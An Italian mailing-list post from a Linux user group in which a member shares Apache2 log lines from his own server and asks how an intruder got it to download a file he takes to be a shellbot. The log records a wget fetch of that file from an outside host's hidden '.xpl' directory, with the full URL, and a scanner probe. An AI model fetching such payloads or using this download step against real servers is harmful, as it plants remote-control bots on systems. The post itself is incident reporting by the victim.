erlug
[Top] [All Lists]

[Erlug] apache hackerato(?)

To: ErLug <erlug@xxxxxxxxxxxxxx>
Subject: [Erlug] apache hackerato(?)
From: Filippo Biondi <fbiondi@xxxxxxxxxxxxxxxx>
Date: Thu, 11 May 2006 19:01:24 +0200
Salve cari,

Faccio seguito al bel talk di venerdi' con queste inquietanti righe
teste' trovate tra i log di apache2.
(volevate un esempio pratico??...mannaggia!!)
 
----------------------------------------------------------------
--23:59:59--  http://1115.org/.xpl/fux
           => `fux'
Resolving 1115.org... 70.96.188.39
Connecting to 1115.org[70.96.188.39]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,341 [text/plain]

    0K .......... ......                                     100%
34.59 KB/s

00:00:00 (34.59 KB/s) - `fux' saved [17341/17341]

kill: usage: kill [-s sigspec | -n signum | -sigspec] [pid | job]... or
kill -l [sigspec]
[Tue May 09 01:17:59 2006] [error] [client 213.137.236.54] client sent
HTTP/1.1 request without hostname (see RFC2616 section
14.23): /w00tw00t.at.ISC.SANS.DFind:)

------------------------------------------------------------------

Il sito in questione e' presente, e' presente anche la sottodirectory
".xpl" con, tra gli altri, il file "fux" che ad una prima lettura sembra
essere uno shellbot.
Non mi sembra che pero' il server abbia riportato danni, tutto e' su e
parrebbe funzionante (spero altresi' che non abbia combinato danni a
terzi).

Ora mi chiedo:

1) Come cavolo e' riuscito a far fare quella request al mio webserver?
Ed a far eseguire il file una volta scaricatolo.
E' per caso dovuto all'azione di un altro script?

2) Puo' essere dovuto ad una mia cattiva configurazione di
libapache2-mod-perl2 o di apache2 (|| $both || $something_else)

3) Devo contattare Zen per far mettere le suddette righe nella slide,
tra gli attacchi unicode e sql-injection :)

Qualche info sul mio apache:
Server: Apache/2.0.54 (Ubuntu) PHP/5.0.5-2ubuntu1.2 mod_ssl/2.0.54
OpenSSL/0.9.7g
Content-Type: text/html; charset=ISO-8859-1

TIA
Ciao
Filo


-- 
Filippo Biondi
[Ubuntu|Debian] GNU User
Linux Registered User #357105
Proud member of 
.:ERLUG:. 
no1984.org member - Stop TCG!

<Prev in Thread] Current Thread [Next in Thread>